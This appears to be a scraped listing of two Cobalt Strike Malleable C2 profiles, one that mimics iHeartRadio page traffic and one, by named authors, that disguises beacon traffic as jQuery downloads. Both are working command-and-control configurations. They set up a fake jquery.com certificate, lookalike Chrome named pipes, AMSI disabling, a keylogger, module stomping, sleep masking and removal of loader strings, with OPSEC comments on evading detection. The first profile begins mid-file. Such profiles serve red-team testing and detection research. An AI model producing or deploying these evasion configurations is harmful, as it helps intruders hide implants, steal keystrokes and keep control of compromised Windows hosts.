159 | <meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/> | |
160 | <link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today's Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 & Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 & Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/> | |
161 | <style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid="; | |
162 | ||
163 | ||
164 | append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 & Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today's Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/> | |
165 | <link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link> | |
166 | </div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div> | |
167 | <div id='jw-wrapper' class='hidden'> | |
168 | <div id='jw-player'></div> | |
169 | </div> | |
170 | <div id='ads-wrapper' class='hidden'> | |
171 | <a id='ads-learn-more' target='_blank'>Learn More</a> | |
172 | <div id='ads-player'></div> | |
173 | </div> | |
174 | <script src=/a/locale/?rel=7.33.1></script> | |
175 | <script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script> | |
176 | <script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script> | |
177 | </body> | |
178 | </html>"; | |
179 | ||
180 | print; | |
181 | } | |
182 | } | |
183 | } | |
184 | ||
185 | http-stager { | |
186 | ||
187 | set uri_x86 "/Console"; | |
188 | set uri_x64 "/console"; | |
189 | ||
190 | client{ | |
191 | header "Host" "www.iheart.com"; | |
192 | header "Accept" "*/*"; | |
193 | header "Accept-Language" "en-US"; | |
194 | header "Connection" "close"; | |
195 | } | |
196 | ||
197 | server { | |
198 | header "Server" "nginx/1.4.6 (Ubuntu)"; | |
199 | header "Content-Type" "text/html; charset=utf-8"; | |
200 | header "Connection" "close"; | |
201 | ||
202 | } | |
203 | ||
204 | ||
205 | } | |
206 | ||
207 | ###Malleable PE Options### | |
208 | ||
209 | post-ex { | |
210 | ||
211 | set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; | |
212 | set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe"; | |
213 | ||
214 | set obfuscate "true"; | |
215 | ||
216 | set smartinject "true"; | |
217 | ||
218 | set amsi_disable "true"; | |
219 | ||
220 | } | |
221 | ||
222 | #use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually. | |
223 | #don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though. | |
224 | stage { | |
225 | set checksum "0"; | |
226 | set compile_time "25 Oct 2016 01:57:23"; | |
227 | set entry_point "170000"; | |
228 | #set image_size_x86 "6586368"; | |
229 | #set image_size_x64 "6586368"; | |
230 | #set name "WWanMM.dll"; | |
231 | set userwx "false"; | |
232 | set cleanup "true"; | |
233 | set sleep_mask "true"; | |
234 | set stomppe "true"; | |
235 | set obfuscate "true"; | |
236 | set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
237 | ||
238 | #obfuscate beacon before sleep. | |
239 | set sleep_mask "true"; | |
240 | ||
241 | #module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working. | |
242 | ||
243 | set module_x86 "wwanmm.dll"; | |
244 | set module_x64 "wwanmm.dll"; | |
245 | ||
246 | #transform allows you to remove, replace, and add strings to beacon's reflective dll stage. | |
247 | transform-x86 { | |
248 | prepend "\x90\x90\x90"; | |
249 | strrep "ReflectiveLoader" ""; | |
250 | strrep "beacon.dll" ""; | |
251 | } | |
252 | ||
253 | transform-x64 { | |
254 | prepend "\x90\x90\x90"; | |
255 | strrep "ReflectiveLoader" ""; | |
256 | strrep "beacon.x64.dll" ""; | |
257 | } | |
258 | ||
259 | } | |
260 | ||
261 | process-inject { | |
262 | ||
263 | set allocator "NtMapViewOfSection"; | |
264 | ||
265 | set min_alloc "16700"; | |
266 | ||
267 | set userwx "false"; | |
268 | ||
269 | set startrwx "true"; | |
270 | ||
271 | transform-x86 { | |
272 | prepend "\x90\x90\x90"; | |
273 | } | |
274 | transform-x64 { | |
275 | prepend "\x90\x90\x90"; | |
276 | } | |
277 | ||
278 | execute { | |
279 | CreateThread "ntdll!RtlUserThreadStart"; | |
280 | CreateThread; | |
281 | NtQueueApcThread; | |
282 | CreateRemoteThread; | |
283 | RtlCreateUserThread; | |
284 | } | |
285 | } |
0 | # Malleable C2 Profile | |
1 | # Version: CobaltStrike 4.2 | |
2 | # File: jquery-c2.4.2.profile | |
3 | # Description: | |
4 | # c2 profile attempting to mimic a jquery.js request | |
5 | # uses signed certificates | |
6 | # or self-signed certificates | |
7 | # Authors: @joevest, @andrewchiles, @001SPARTaN | |
8 | ||
9 | ################################################ | |
10 | ## Tips for Profile Parameter Values | |
11 | ################################################ | |
12 | ||
13 | ## Parameter Values | |
14 | ## Enclose parameter in Double quote, not single | |
15 | ## set useragent "SOME AGENT"; GOOD | |
16 | ## set useragent 'SOME AGENT'; BAD | |
17 | ||
18 | ## Some special characters do not need escaping | |
19 | ## prepend "!@#$%^&*()"; | |
20 | ||
21 | ## Semicolons are ok | |
22 | ## prepend "This is an example;"; | |
23 | ||
24 | ## Escape Double quotes | |
25 | ## append "here is \"some\" stuff"; | |
26 | ||
27 | ## Escape Backslashes | |
28 | ## append "more \\ stuff"; | |
29 | ||
30 | ## HTTP Values | |
31 | ## Program .http-post.client must have a compiled size less than 252 bytes. | |
32 | ||
33 | ################################################ | |
34 | ## Profile Name | |
35 | ################################################ | |
36 | ## Description: | |
37 | ## The name of this profile (used in the Indicators of Compromise report) | |
38 | ## Defaults: | |
39 | ## sample_name: My Profile | |
40 | ## Guidelines: | |
41 | ## - Choose a name that you want in a report | |
42 | set sample_name "jQuery CS 4.2 Profile"; | |
43 | ||
44 | ################################################ | |
45 | ## Sleep Times | |
46 | ################################################ | |
47 | ## Description: | |
48 | ## Timing between beacon check in | |
49 | ## Defaults: | |
50 | ## sleeptime: 60000 | |
51 | ## jitter: 0 | |
52 | ## Guidelines: | |
53 | ## - Beacon Timing in milliseconds (1000 = 1 sec) | |
54 | set sleeptime "45000"; # 45 Seconds | |
55 | #set sleeptime "300000"; # 5 Minutes | |
56 | #set sleeptime "600000"; # 10 Minutes | |
57 | #set sleeptime "900000"; # 15 Minutes | |
58 | #set sleeptime "1200000"; # 20 Minutes | |
59 | #set sleeptime "1800000"; # 30 Minutes | |
60 | #set sleeptime "3600000"; # 1 Hours | |
61 | set jitter "37"; # % jitter | |
62 | ||
63 | ################################################ | |
64 | ## Server Response Size jitter | |
65 | ################################################ | |
66 | ## Description: | |
67 | ## Append random-length string (up to data_jitter value) to http-get and http-post server output. | |
68 | set data_jitter "100"; | |
69 | ||
70 | ################################################ | |
71 | ## HTTP Client Header Removal | |
72 | ################################################ | |
73 | ## Description: | |
74 | ## Global option to force Beacon's WinINet to remove specified headers late in the HTTP/S transaction process. | |
75 | ## Value: | |
76 | ## headers_remove Comma-separated list of HTTP client headers to remove from Beacon C2. | |
77 | # set headers_remove "Strict-Transport-Security, header2, header3"; | |
78 | ||
79 | ################################################ | |
80 | ## Beacon User-Agent | |
81 | ################################################ | |
82 | ## Description: | |
83 | ## User-Agent string used in HTTP requests, CS versions < 4.2 approx 128 max characters, CS 4.2+ max 255 characters | |
84 | ## Defaults: | |
85 | ## useragent: Internet Explorer (Random) | |
86 | ## Guidelines | |
87 | ## - Use a User-Agent values that fits with your engagement | |
88 | ## - useragent can only be 128 chars | |
89 | ## IE 10 | |
90 | # set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)"; | |
91 | ## MS IE 11 User Agent | |
92 | set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; | |
93 | ||
94 | ################################################ | |
95 | ## SSL CERTIFICATE | |
96 | ################################################ | |
97 | ## Description: | |
98 | ## Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener | |
99 | ## Defaults: | |
100 | ## All certificate values are blank | |
101 | ## Guidelines: | |
102 | ## - Best Option - Use a certifcate signed by a trusted certificate authority | |
103 | ## - Ok Option - Create your own self signed certificate | |
104 | ## - Option - Set self-signed certificate values | |
105 | https-certificate { | |
106 | ||
107 | ## Option 1) Trusted and Signed Certificate | |
108 | ## Use keytool to create a Java Keystore file. | |
109 | ## Refer to https://www.cobaltstrike.com/help-malleable-c2#validssl | |
110 | ## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh | |
111 | ||
112 | ## Option 2) Create your own Self-Signed Certificate | |
113 | ## Use keytool to import your own self signed certificates | |
114 | ||
115 | #set keystore "/pathtokeystore"; | |
116 | #set password "password"; | |
117 | ||
118 | ## Option 3) Cobalt Strike Self-Signed Certificate | |
119 | set C "US"; | |
120 | set CN "jquery.com"; | |
121 | set O "jQuery"; | |
122 | set OU "Certificate Authority"; | |
123 | set validity "365"; | |
124 | } | |
125 | ||
126 | ################################################ | |
127 | ## TCP Beacon | |
128 | ################################################ | |
129 | ## Description: | |
130 | ## TCP Beacon listen port | |
131 | ## - https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/ | |
132 | ## - https://www.cobaltstrike.com/help-tcp-beacon | |
133 | ## TCP Frame Header | |
134 | ## - Added in CS 4.1, prepend header to TCP Beacon messages | |
135 | ## Defaults: | |
136 | ## tcp_port: 4444 | |
137 | ## tcp_frame_header: N\A | |
138 | ## Guidelines | |
139 | ## - OPSEC WARNING!!!!! The default port is 4444. This is bad. You can change dynamicaly but the port set in the profile will always be used first before switching to the dynamic port. | |
140 | ## - Use a port other that default. Choose something not is use. | |
141 | ## - Use a port greater than 1024 is generally a good idea | |
142 | set tcp_port "42585"; | |
143 | set tcp_frame_header "\x80"; | |
144 | ||
145 | ################################################ | |
146 | ## SMB beacons | |
147 | ################################################ | |
148 | ## Description: | |
149 | ## Peer-to-peer beacon using SMB for communication | |
150 | ## SMB Frame Header | |
151 | ## - Added in CS 4.1, prepend header to SMB Beacon messages | |
152 | ## Defaults: | |
153 | ## pipename: msagent_## | |
154 | ## pipename_stager: status_## | |
155 | ## smb_frame_header: N\A | |
156 | ## Guidelines: | |
157 | ## - Do not use an existing namedpipe, Beacon doesn't check for conflict! | |
158 | ## - the ## is replaced with a number unique to a teamserver | |
159 | ## --------------------- | |
160 | set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe | |
161 | set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe | |
162 | set smb_frame_header "\x80"; | |
163 | ||
164 | ################################################ | |
165 | ## DNS beacons | |
166 | ################################################ | |
167 | ## Description: | |
168 | ## Beacon that uses DNS for communication | |
169 | ## Defaults: | |
170 | ## maxdns: 255 | |
171 | ## dns_idle: 0.0.0.0 | |
172 | ## dns_max_txt: 252 | |
173 | ## dns_sleep: 0 | |
174 | ## dns_stager_prepend: N/A | |
175 | ## dns_stager_subhost: .stage.123456. | |
176 | ## dns_ttl: 1 | |
177 | ## Guidelines: | |
178 | ## - DNS beacons generate a lot of DNS request. DNS beacon are best used as low and slow back up C2 channels | |
179 | set maxdns "255"; | |
180 | set dns_max_txt "252"; | |
181 | set dns_idle "74.125.196.113"; #google.com (change this to match your campaign) | |
182 | set dns_sleep "0"; # Force a sleep prior to each individual DNS request. (in milliseconds) | |
183 | set dns_stager_prepend ".resources.123456."; | |
184 | set dns_stager_subhost ".feeds.123456."; | |
185 | ||
186 | ################################################ | |
187 | ## SSH beacons | |
188 | ################################################ | |
189 | ## Description: | |
190 | ## Peer-to-peer SSH pseudo-Beacon for lateral movement | |
191 | ## ssh_banner | |
192 | ## - Added in Cobalt Strike 4.1, changes client SSH banner | |
193 | ## Defaults: | |
194 | ## ssh_banner: Cobalt Strike 4.2 | |
195 | set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)"; | |
196 | set ssh_pipename "wkssvc##"; | |
197 | ||
198 | ||
199 | ################################################ | |
200 | ## Staging process | |
201 | ################################################ | |
202 | ## OPSEC WARNING!!!! Staging has serious OPSEC issues. It is recommed to disable staging and use stageless payloads | |
203 | ## Description: | |
204 | ## Malleable C2's http-stager block customizes the HTTP staging process | |
205 | ## Defaults: | |
206 | ## uri_x86 Random String | |
207 | ## uri_x64 Random String | |
208 | ## HTTP Server Headers - Basic HTTP Headers | |
209 | ## HTTP Client Headers - Basic HTTP Headers | |
210 | ## Guidelines: | |
211 | ## - Add customize HTTP headers to the HTTP traffic of your campaign | |
212 | ## - Only specify the `Host` header when peforming domain fronting. Be aware of HTTP proxy's rewriting your request per RFC2616 Section 14.23 | |
213 | ## - https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/ | |
214 | ## - Note: Data transform language not supported in http stageing (mask, base64, base64url, etc) | |
215 | ||
216 | set host_stage "false"; # Do not use staging. Must use stageles payloads, now the default for Cobalt Strike built-in processes | |
217 | #set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set | |
218 | ||
219 | http-stager { | |
220 | set uri_x86 "/jquery-3.3.1.slim.min.js"; | |
221 | set uri_x64 "/jquery-3.3.2.slim.min.js"; | |
222 | ||
223 | server { | |
224 | header "Server" "NetDNA-cache/2.2"; | |
225 | header "Cache-Control" "max-age=0, no-cache"; | |
226 | header "Pragma" "no-cache"; | |
227 | header "Connection" "keep-alive"; | |
228 | header "Content-Type" "application/javascript; charset=utf-8"; | |
229 | output { | |
230 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) | |
231 | # 2nd Line | |
232 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r"; | |
233 | # 1st Line | |
234 | prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"; | |
235 | append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; | |
236 | print; | |
237 | } | |
238 | } | |
239 | ||
240 | client { | |
241 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; | |
242 | header "Accept-Language" "en-US,en;q=0.5"; | |
243 | #header "Host" "code.jquery.com"; | |
244 | header "Referer" "http://code.jquery.com/"; | |
245 | header "Accept-Encoding" "gzip, deflate"; | |
246 | } | |
247 | } | |
248 | ||
249 | ################################################ | |
250 | ## Post Exploitation | |
251 | ################################################ | |
252 | ## Description: | |
253 | ## Controls post-exploitation jobs, including default x86/x64 program to open and inject shellcode into, AMSI bypass for execute-assembly, powerpick, and psinject | |
254 | ## https://www.cobaltstrike.com/help-malleable-postex | |
255 | ## Values: | |
256 | ## spawnto_x86 %windir%\\syswow64\\rundll32.exe | |
257 | ## spawnto_x64 %windir%\\sysnative\\rundll32.exe | |
258 | ## obfuscate false CS 3.14 - Scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way | |
259 | ## pipename postex_####, windows\\pipe_## CS 4.2 - Change the named pipe names used, by post-ex DLLs, to send output back to Beacon. This option accepts a comma-separated list of pipenames. Cobalt Strike will select a random pipe name from this option when it sets up a post-exploitation job. Each # in the pipename is replaced with a valid hex character as well. | |
260 | ## smartinject false CS 3.14 added to postex block - Directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. | |
261 | ## amsi_disable false CS 3.13 - Directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities. | |
262 | ## keylogger GetAsyncKeyState CS 4.2 - The GetAsyncKeyState option (default) uses the GetAsyncKeyState API to observe keystrokes. The SetWindowsHookEx option uses SetWindowsHookEx to observe keystrokes. | |
263 | ## threadhint CS 4.2 - allows multi-threaded post-ex DLLs to spawn threads with a spoofed start address. Specify the thread hint as "module!function+0x##" to specify the start address to spoof. The optional 0x## part is an offset added to the start address. | |
264 | ## Guidelines | |
265 | ## - spawnto can only be 63 chars | |
266 | ## - OPSEC WARNING!!!! The spawnto in this example will contain identifiable command line strings | |
267 | ## - sysnative for x64 and syswow64 for x86 | |
268 | ## - Example x64 : C:\\Windows\\sysnative\\w32tm.exe | |
269 | ## Example x86 : C:\\Windows\\syswow64\\w32tm.exe | |
270 | ## - The binary doesnt do anything wierd (protected binary, etc) | |
271 | ## - !! Don't use these !! | |
272 | ## - "csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe" | |
273 | ## - A binary that executes without the UAC | |
274 | ## - 64 bit for x64 | |
275 | ## - 32 bit for x86 | |
276 | ## - You can add command line parameters to blend | |
277 | ## - set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs"; | |
278 | ## - set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs"; | |
279 | ## - Note: svchost.exe may look weird as the parent process | |
280 | ## - The obfuscate option scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way. It’s very similar to the obfuscate and userwx options available for Beacon via the stage block. | |
281 | ## - The amsi_disable option directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities. | |
282 | ## - The smartinject option directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. This allows post-ex DLLs to bootstrap themselves in a new process without shellcode-like behavior that is detected and mitigated by watching memory accesses to the PEB and kernel32.dll | |
283 | ||
284 | post-ex { | |
285 | # Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes | |
286 | set spawnto_x86 "%windir%\\syswow64\\dllhost.exe"; | |
287 | # Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon. | |
288 | set spawnto_x64 "%windir%\\sysnative\\dllhost.exe"; | |
289 | # change the permissions and content of our post-ex DLLs | |
290 | set obfuscate "true"; | |
291 | # pass key function pointers from Beacon to its child jobs | |
292 | set smartinject "true"; | |
293 | # disable AMSI in powerpick, execute-assembly, and psinject | |
294 | set amsi_disable "true"; | |
295 | # Modify our post-ex pipe names | |
296 | set pipename "Winsock2\\CatalogChangeListener-###-0,"; | |
297 | set keylogger "GetAsyncKeyState"; | |
298 | #set threadhint "module!function+0x##" | |
299 | } | |
300 | ||
301 | ################################################ | |
302 | ## Memory Indicators | |
303 | ################################################ | |
304 | ## Description: | |
305 | ## The stage block in Malleable C2 profiles controls how Beacon is loaded into memory and edit the content of the Beacon Reflective DLL. | |
306 | ## Values: | |
307 | ## allocator VirtualAlloc CS 4.2 - Set how Beacon's Reflective Loader allocates memory for the agent. Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc | |
308 | ## checksum 0 The CheckSum value in Beacon's PE header | |
309 | ## cleanup false Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it. | |
310 | ## compile_time 14 July 2009 8:14:00 The build time in Beacon's PE header | |
311 | ## entry_point 92145 The EntryPoint value in Beacon's PE header | |
312 | ## image_size_x64 512000 SizeOfImage value in x64 Beacon's PE header | |
313 | ## image_size_x86 512000 SizeOfImage value in x86 Beacon's PE header | |
314 | ## magic_mz_x86 MZRE CS 4.2 - Override the first bytes (MZ header included) of Beacon's Reflective DLL. Valid x86 instructions are required. Follow instructions that change CPU state with instructions that undo the change. | |
315 | ## magic_mz_x64 MZAR CS 4.2 - Same as magic_mz_x86; affects x64 DLL. | |
316 | ## module_x64 xpsservices.dll Same as module_x86; affects x64 loader | |
317 | ## module_x86 xpsservices.dll Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc. | |
318 | ## magic_pe PE Override the PE character marker used by Beacon's Reflective Loader with another value. | |
319 | ## name beacon.x64.dll The Exported name of the Beacon DLL | |
